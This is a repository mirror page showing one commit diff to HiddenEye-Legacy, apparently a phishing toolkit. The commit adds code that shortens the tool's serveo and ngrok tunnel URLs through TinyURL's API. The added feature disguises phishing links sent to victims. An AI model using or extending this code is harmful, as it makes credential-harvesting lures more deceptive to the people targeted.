mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
tinyurl support
This commit is contained in:
parent
f652fca382
commit
16967dbab5
|
@ -298,7 +298,11 @@ def serveo():
|
|||
output = check_output("grep -o 'https://[0-9a-z]*\.serveo.net' link.url", shell=True)
|
||||
url = str(output).strip("b ' \ n")
|
||||
print("\n {0}[{1}*{0}]{1} SERVEO URL: {2}".format(CYAN, END, GREEN) + url + "{1}".format(CYAN, END, GREEN))
|
||||
print('\n')
|
||||
data = urlopen("http://tinyurl.com/api-create.php?url="+url)
|
||||
url = data.read()
|
||||
link = url.decode('utf-8')
|
||||
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, END, GREEN) + link + "{1}".format(CYAN, END, GREEN))
|
||||
print("\n")
|
||||
|
||||
def runNgrok():
|
||||
system('./Server/ngrok http 1111 > /dev/null &')
|
||||
|
@ -310,6 +314,11 @@ def runNgrok():
|
|||
urlFile.close()
|
||||
if re.match("https://[0-9a-z]*\.ngrok.io", url) != None:
|
||||
print("\n {0}[{1}*{0}]{1} Ngrok URL: {2}".format(CYAN, END, GREEN) + url + "{1}".format(CYAN, END, GREEN))
|
||||
data = urlopen("http://tinyurl.com/api-create.php?url="+url)
|
||||
url = data.read()
|
||||
link = url.decode('utf-8')
|
||||
print("\n {0}[{1}*{0}]{1} TINYURL: {2}".format(CYAN, END, GREEN) + link + "{1}".format(CYAN, END, GREEN))
|
||||
print("\n")
|
||||
break
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue
Block a user